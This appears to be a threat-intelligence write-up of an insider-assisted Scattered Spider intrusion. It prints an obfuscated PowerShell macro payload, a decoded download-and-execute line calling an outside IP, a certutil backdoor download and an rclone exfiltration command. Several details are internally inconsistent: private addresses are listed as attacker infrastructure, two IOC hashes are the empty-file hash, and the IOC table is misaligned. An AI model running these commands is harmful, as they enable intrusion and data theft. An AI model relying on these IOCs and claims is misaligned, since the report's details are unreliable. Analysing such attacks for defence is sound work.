top of page

Scattered Spider from Insider Approved Phishing to Cloud Exfiltration While Living off the Land

Spida Killa Labs analyzed an attack that leverages insiders to provide access to cloud services using living off the land tools.

The attack, linked to the Scattered Spider threat actor, begins with the recruitment of an insider key positioned to facilitate the attack while attempting to blend in with regular activities. Once Scattered Spider has made contact with the insider, they are offered 1 BTC (69,644.70 USD) to click on a designated link which will arrive via a pre-arranged phishing email.  

Scattered Spider.png

Clicking on this link will install a version of the Splashtop Remote Monitoring and Management  (RMM) software enabling Scattered Spider to have continuous access to the victim network as the insider. The attacker used this installation of Splashtop to move laterally via all RDP sessions and shared drives observed over the 37 day reconnaissance phase. As new endpoints are compromised, Splashtop is installed on each to maintain access.

 

As new endpoints are compromised, an arbitrary code execution vulnerability in Okta Verify (CVE-2024–0980) was used to obtain system access on each endpoint.

 

A second method of lateral movement was observed where the attacker modified Excel files on shared drives to execute a macro to yield further access. This macro would execute the following powershell:

 

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreAAA8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKAAADgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

 

Which decodes to:

 

Powershell.exe -noexit $c1=(New-ObjectNet.We;

$c4=bClient).Downlo;

$c3=adString(http://185.7.214[.]7/PP91.PNG);

$JI=($c1,$c4,$c3 -Join);

I`E`X$JI|I`E`X”

 

While the PP91.PNG

(2166c66f90ef87f21dc4f2b48f2b47ec3b401caca1ad068c2093fff713ef73bc) downloaded from the previous stage has an image file extension .PNG, in fact it is another PowerShell script but without obfuscation.

 

The PowerShell in PP91.PNG will download a backdoor via certutil.exe.

 

certutil.exe -urlcache -f http://10.0.0[.]5/ssd.dll C:\Users\Public\Documents\ssd.dll

and save it to C:\Users\Public\Documents\ssd.dll

(63996a39755e84ee8b5d3f47296991362a17afaaccf2ac43207a424a366f4cc9).

 

Each compromised endpoint will have its Microsoft 365 tokens dumped by OfficeMemScraper.ps1 and exfiltrated. AWS credential files are also exfiltrated.

 

The attacker enumerates the endpoint for all other files of importance using a script called cr0wnj3welz.ps1. The files found to be important by this script are exfiltrated to Mega[.]io using rclone.exe which has been renamed to dumper.exe.

 

c:\Windows\system32\cmd.exe /C C:\Users\barne\dumper.exe config create remote mega user [redacted]@gmail.com pass [redacted]

 

The attacker then sets the Microsoft 365 SharePoint and OneDrive sharing of all files to “Anyone” to grant themselves access.

 

The attacker is then known to download these files from 192.168.1[.]1 and 10.0.0[.]1.  

 

IOCs

Filename
SHA256
C:\Users\Public\Documents\ssd.dll
63996a39755e84ee8b5d3f47296991362a17afaaccf2ac43207a424a366f4cc9
PP91.PNG
2166c66f90ef87f21dc4f2b48f2b47ec3b401caca1ad068c2093fff713ef73bc
OfficeMemScraper.ps1
C:\Users\<USERNAME>\.aws\credentials
Varies
C:\Program Files (x86)\Okta\UpdateService\wintrust.dll
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
New_order.pdf
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Addresses Used

185.7.214[.]7

192.168.1[.]1

10.0.0[.]1

10.0.0[.]5

bottom of page